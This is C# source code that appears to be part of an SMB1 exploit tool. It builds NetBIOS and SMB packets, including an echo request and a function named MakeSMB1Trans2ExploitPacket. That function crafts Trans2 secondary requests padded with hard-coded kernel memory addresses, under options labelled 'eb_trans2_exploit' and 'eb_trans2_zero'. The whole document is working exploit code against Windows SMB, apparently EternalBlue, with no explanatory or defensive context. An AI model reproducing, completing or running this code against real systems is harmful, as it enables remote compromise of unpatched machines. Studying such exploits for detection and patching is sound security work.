static public byte[] SetNetBiosHeader(byte[] pkt) { uint size = (uint)pkt.Length; byte[] intBytes = BitConverter.GetBytes(size).Reverse().ToArray(); NETBIOS_HEADER netbios_header = new NETBIOS_HEADER(); netbios_header.MessageTypeAndSize = BitConverter.ToUInt32(intBytes, 0); byte[] netbios_header_packet = GetBytes(netbios_header); byte[] fullMessage = netbios_header_packet.Concat(pkt).ToArray(); return(fullMessage); }
static public byte[] MakeSMB1EchoPacket(ushort TID, ushort UID) { NETBIOS_HEADER NTHeader = new NETBIOS_HEADER { MessageTypeAndSize = 0x31000000 }; SMB_HEADER header = new SMB_HEADER { protocol = 0x424d53ff, command = 0x2b, errorClass = 0x00, _reserved = 0x00, errorCode = 0x0000, flags = 0x98, flags2 = 0xc007, PIDHigh = 0x0000, SecurityFeatures = 0x0000000000000000, reserved = 0x0000, TID = TID, PIDLow = 0xfeff, UID = UID, MID = 0x0040 }; byte[] headerBytes = GetBytes(NTHeader).Concat(GetBytes(header)).ToArray(); SMB_COM_ECHO_REQUEST echoRequest = new SMB_COM_ECHO_REQUEST { WordCount = 0x1, EchoSequenceNumber = 0x0001, }; //Add SMBData List <byte> SMBData = new List <byte>(); SMBData.AddRange(Enumerable.Repeat((byte)0x41, 11)); SMBData.Add(0x00); echoRequest.ByteCount = (ushort)(SMBData.Count); //Merge SMBHeader with the echoRequest byte[] echoRequestBytes = GetBytes(echoRequest).Concat(SMBData.ToArray()).ToArray(); byte[] pkt = headerBytes.Concat(echoRequestBytes).ToArray(); return(pkt); }
static public byte[] MakeSMB1Trans2ExploitPacket(ushort TID, ushort UID, string type, int time) { NETBIOS_HEADER NTHeader = new NETBIOS_HEADER { MessageTypeAndSize = 0x35100000 }; SMB_HEADER header = new SMB_HEADER { protocol = 0x424d53ff, command = 0x33, errorClass = 0x00, _reserved = 0x00, errorCode = 0x0000, flags = 0x18, flags2 = 0xc007, PIDHigh = 0x0000, SecurityFeatures = 0x0000000000000000, reserved = 0x0000, TID = TID, PIDLow = 0xfeff, UID = UID, MID = 0x0040 }; byte[] headerBytes = GetBytes(NTHeader).Concat(GetBytes(header)).ToArray(); SMB_COM_TRANSACTION2_SECONDARY_REQUEST transaction2SecondaryRequest = new SMB_COM_TRANSACTION2_SECONDARY_REQUEST { WordCount = 0x09, TotalParameterCount = 0x0102, TotalDataCount = 0x1000, ParameterCount = 0x0000, ParameterOffset = 0x0000, ParameterDisplacement = 0x0000, DataCout = 0x1000, DataOffset = 0x0035, DataDisplacement = 0x0000, //we change this with our timeout int later FID = 0x0000, ByteCount = 0x1000 }; int timeout = (time * 16) + 3; transaction2SecondaryRequest.DataDisplacement = BitConverter.ToUInt16(new byte[] { 0xd0, BitConverter.GetBytes(timeout)[0] }, 0); //Merge SMBHeader with the transaction2SecondaryRequest byte[] transaction2SecondaryRequestBytes = GetBytes(transaction2SecondaryRequest); byte[] pkt = headerBytes.Concat(transaction2SecondaryRequestBytes).ToArray(); if (type.Equals("eb_trans2_exploit")) { List <byte> SMBData = new List <byte>(); SMBData.AddRange(Enumerable.Repeat((byte)0x00, 2957)); SMBData.AddRange(new List <byte>() { 0x80, 0x00, 0xa8, 0x00 }); SMBData.AddRange(Enumerable.Repeat((byte)0x00, 16)); SMBData.AddRange(new List <byte>() { 0xff, 0xff }); SMBData.AddRange(Enumerable.Repeat((byte)0x00, 6)); SMBData.AddRange(new List <byte>() { 0xff, 0xff }); SMBData.AddRange(Enumerable.Repeat((byte)0x00, 22)); SMBData.AddRange(new List <byte>() { 0x00, 0xf1, 0xdf, 0xff // x86 addresses }); SMBData.AddRange(Enumerable.Repeat((byte)0x00, 8)); SMBData.AddRange(new List <byte>() { 0x20, 0xf0, 0xdf, 0xff, 0x00, 0xf1, 0xdf, 0xff, 0xff, 0xff, 0xff, 0xff, 0x60, 0x00, 0x04, 0x10 }); SMBData.AddRange(Enumerable.Repeat((byte)0x00, 4)); SMBData.AddRange(new List <byte>() { 0x80, 0xef, 0xdf, 0xff }); SMBData.AddRange(Enumerable.Repeat((byte)0x00, 4)); SMBData.AddRange(new List <byte>() { 0x10, 0x00, 0xd0, 0xff, 0xff, 0xff, 0xff, 0xff, 0x18, 0x01, 0xd0, 0xff, 0xff, 0xff, 0xff, 0xff }); SMBData.AddRange(Enumerable.Repeat((byte)0x00, 0x10)); SMBData.AddRange(new List <byte>() { 0x60, 0x00, 0x04, 0x10 }); SMBData.AddRange(Enumerable.Repeat((byte)0x00, 0xc)); SMBData.AddRange(new List <byte>() { 0x90, 0xff, 0xcf, 0xff, 0xff, 0xff, 0xff, 0xff }); SMBData.AddRange(Enumerable.Repeat((byte)0x00, 0x8)); SMBData.AddRange(new List <byte>() { 0x80, 0x10 }); SMBData.AddRange(Enumerable.Repeat((byte)0x00, 0xe)); SMBData.AddRange(new List <byte>() { 0x39, 0xbb }); SMBData.AddRange(Enumerable.Repeat((byte)0x41, 965)); pkt = pkt.Concat(SMBData.ToArray()).ToArray(); return(pkt); } if (type.Equals("eb_trans2_zero")) { List <byte> SMBData = new List <byte>(); SMBData.AddRange(Enumerable.Repeat((byte)0x00, 2055)); SMBData.Add(0x83); SMBData.Add(0xf3); SMBData.AddRange(Enumerable.Repeat((byte)0x41, 2039)); pkt = pkt.Concat(SMBData.ToArray()).ToArray(); //Collect it all return(pkt); } else { List <byte> SMBData = new List <byte>(); SMBData.AddRange(Enumerable.Repeat((byte)0x41, 4096)); pkt = pkt.Concat(SMBData.ToArray()).ToArray(); //Collect it all } return(pkt); }